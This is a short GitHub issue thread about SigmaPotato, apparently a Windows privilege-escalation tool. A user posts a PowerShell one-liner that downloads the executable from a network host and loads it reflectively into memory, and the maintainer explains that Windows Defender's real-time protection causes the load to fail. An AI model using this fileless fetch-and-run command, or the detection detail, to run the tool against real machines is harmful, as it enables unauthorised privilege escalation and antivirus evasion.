### ISSUE TITLE
Remote load

### ISSUE THREAD

**Issue by S0me1-dev** [tylerdotrar/SigmaPotato#2]
PS C:\Users\N0on3> [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://192.168.31.206:8001/SigmaPotato.exe"))

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '60416 bytes loaded from Anonymously
Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An
attempt was made to load a program with an incorrect format."
At line:1 char:1
+ [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient). ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : BadImageFormatException
    
    
    
  Again on one pc all ok , in new version. on another ofk it catched by def , but cant load via pyhton server. Thanks for updates!

**Comment by tylerdotrar** [comment]
Thanks for the issue report!  Two questions:

1. What version of Windows are you using?
2. Is Windows Defender enabled?

Currently ``SigmaPotato`` gets caught by up-to-date Windows Defender definitions -- so if Windows Defender "Real-time Protection" is **ENABLED**, you will get that error when attempting to load it remotely.
